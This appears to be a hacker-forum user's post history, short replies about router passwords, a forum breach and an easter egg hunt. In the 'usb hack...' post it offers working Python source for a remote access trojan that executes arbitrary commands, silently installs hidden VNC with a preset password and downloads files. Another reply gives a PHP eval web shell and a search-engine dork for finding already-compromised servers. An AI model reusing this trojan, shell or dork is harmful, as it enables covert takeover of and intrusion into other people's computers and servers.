[Resetting Gargoyle root password]

Why not try the httpd exploit for dd-wrt? I dont know if it will work but it is worth a try.

[OpenSSH <= 5.2 zero day exploit code - 48hrs until it is publicly released?]

There are going to be a bunch more "0-days" over the next few months that are going to be bogus. Some of them now are nothing but malware. Be wary of what you run.

[Forum "password recovery" is not a recovery]

I wish hak5 had down vote buttons.

[Power User to Administrator]

source code?

[usb hack...]

Here is a RAT i have been working on in python. Its not done. Download Terry the Trojan and use that as the client to send/recieve data.

from Tkinter import *
 from tkMessageBox import *
 from ScrolledText import *
 import socket
 import sys

 portvar = 2727
 try:
     if sys.argv[1] == "/port":
         try:
             portvar = int(sys.argv[2])
         except:
             portvar = 2727
 except:
     portvar = 2727

 def std(string):
     stdbox.config(state=NORMAL)
     stdbox.insert(END,"" + string + "\n")
     stdbox.config(state=DISABLED)

 def cnnect(var="poo"):
     sockt = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
     success = 1
     try:
         sockt.connect((ipbox.get(),portvar))
     except:
         success = 0
         std("Connection to " + ipbox.get() + " on port " + str(portvar) + " failed.")
     if success == 1:
         sockt.send(cmdbox.get())
         retdata = sockt.recv(2048)
         std(retdata)

 root = Tk()
 root.title("Terry the Trojan")
 #FRAMES
 ipfrm = Frame(root)
 ipfrm.pack()
 cmdfrm = Frame(root)
 cmdfrm.pack()
 stdfrm = Frame(root)
 stdfrm.pack()
 #IP/Port Entry Widgets
 Label(ipfrm,text="Host/IP adress:").grid(row=1,column=1)
 ipbox = Entry(ipfrm,width=50)
 ipbox.grid(row=1,column=2)
 #Returned output widgets
 stdbox = ScrolledText(stdfrm,width=70,height=20,state=DISABLED,bg="#c0c0c0",fg="#000000")
 stdbox.grid(row=1,column=1)
 #Command sending widgets
 cmdbox = Entry(cmdfrm,width=50)
 cmdbox.grid(row=1,column=1)
 Button(cmdfrm,text="Send Command",command=cnnect).grid(row=1,column=2)
 cmdbox.bind("<Return>",cnnect)
 root.mainloop()

HAH shit wrong code. Ill post it in a min.

OK HERE is the RAT, sorry about that. You should be able to tell what the commands do.

import socket,os,sys,urllib,re,ftplib
from time import sleep
port = 2727
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockt = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sockt.bind(('',port))
sockt.listen(1)
while True:
    channel, details = sockt.accept()
    command = channel.recv(2048)
    if command == "kill":
        channel.send("Server trojan has been closed.")
        sys.exit()
    elif command == "ip":
        connect = s.connect(("www.whatismyipaddress.com", 80))
        s.send('GET / HTTP/1.0\n\n')
        socketlines = s.recv(2048)
        lines = socketlines.split()
        ip = lines[len(lines) - 1]
        channel.send(ip)
    elif command == "whoami":
        channel.send(os.environ["USERNAME"])
    elif command == "drive":
        channel.send(os.environ["HOMEDRIVE"])
    elif command == "userfolder":
        channel.send(os.environ["HOMEPATH"])
    elif command == "installvnc":
        urllib.urlretrieve('http://downloads.sourceforge.net/vnc-tight/tightvnc-1.3.10-setup.exe','update.exe')
        fs=os.popen3('update.exe /sp- /verysilent','b')
        sleep(1)
        fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v Password /t Binary /d 68,DF,59,F8,C5,23,54,33','b')
        sleep(1)
        fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v Password /t Binary /d 68,DF,59,F8,C5,23,54,33','b')
        sleep(0.2)
        fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1','b')
        sleep(0.5)
        fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1','b')
        sleep(1)
        fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v RemoveWallpaper /t REG_DWORD /d 0','b')
        sleep(0.3)
        fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v RemoveWallpaper /t REG_DWORD /d 0','b')
        sleep(1)
        fs=os.popen3('net start "VNC Server"','b')
        fs=os.popen3('del update.exe','b')
        channel.send("VNC was installed, password is vncserv.")
    elif command == "netstat":
        fs=os.popen3('netstat -ano>windsys.ini','b')
        sleep(2)
        f = open('windsys.ini')
        channel.send(f.read())
        f.close()
    elif command == "whereami":
        channel.send(os.getcwd())
    elif command.startswith("download "):
        file = command.replace("download ", "")
        urllib.urlretrieve(file,"file.exe")
        channel.send("File downloaded. Saved as 'file.exe', rename extension")     
    else:
        csuc = 1
        try:
            fs=os.popen3(command,'b')
        except:
            csuc = 0
        if csuc == 1:
            channel.send("Command Sucessful")
        else:
            channel.send("Command Failed")
        channel.close()

[Inject Ads into hotpsots]

To much processing power. You will need a big ass router.

[Old Passwords]

Mine was 1<3m4|\|U3)

[Being Hacked. Damage Control.]

The pwnies being the pwned?

[Inject Ads into hotpsots]

If you could get Airpwn running on a fon or other FOSS router then I think that would be more than enough.

[The server hosting Hak5.org and the Hak5 forums was hacked.]

I don't know of a forum software that doesn't send out *temporary* passwords in plain text. PHPBB, Simple Machines Forum and Invision Power Board all share this behaviour. If your email isn't secure, we can't help you on that front, other than suggest you look at hushmail.

I havent played around with PHPbb, but I know other forums that send you a reset link. If anything I'd expected to receive a temporary password and be asked to change it. I just hope that the password I am sent is hashed in the db after it has been sent to me.

Just saw you post Vako. Glad they were hashed. Good luck BFing the good ones.

[trying to find a program]

Python can do that with ease. This code does it for google groups but can be easily modified to fit your needs.

[coldboot episode and usb drive]

Darren has the complied version of it on his site, link. I also have the AESkey find compiled if anyone needs that.

[can google be used as a hacking tool?]

My favorite way is to use the "Welcome to phpMyAdmin" AND " Create new database" dork and find databases that have already been poped. Look for

<?php eval($_POST[cmd]);?>

And try to find the page where you send commands. That or root the box your self from there.

[The server hosting Hak5.org and the Hak5 forums was hacked.]

Why am I being email a plain text password when I try to recover my account? I know that I should change it but I am not sure if other are sure about what to do.

[511 Easter Egg Hunt]

Nope, not saying that at all. Just saying that brute forcing it isn't going to get you everything you need. Gotta actually solve it.

http://twitter.com/hak5darren/status/1664879332

If you havent solved it dont try to help with it.

[Episode 5x11]

Most of the shit Matt says is a bit pointless anyways. Bashing his own users and a really use python script? He does know his servers and topography though.

Just like the elitist Linux users, the same crowd also exist in the MAC and Windows world. Use what works for you and shut up. If some one ask then inform them, give them a demo... if not let them do what they want.

[511 Easter Egg Hunt]

Ditto

[511 Easter Egg Hunt]

Fuck that. If I win I demand some of his hair.

[511 Easter Egg Hunt]

why not scan the domain and see what ports are opened?

[511 Easter Egg Hunt]

I am stuck on the lie atm

[X3non File Distribution Network]

What is porn? http://x3non.com/download/ANON/84/1241040292481.jpg

[511 Easter Egg Hunt]

1st one is easy, but logging in is a bit harder.

[Microsoft pulls plug on autorun]

Still wont stop boot hijack. Long live physical access!

[whats this]

ManwithWhiteFishForehead Kicking Game?

>_> you sir, are a genius.

[whats this]

Hai guise. I used to play this game. There were these options and some characters and you fought bad guys. I cant remember anything else about it, only that it was a long time ago. Can I has halp?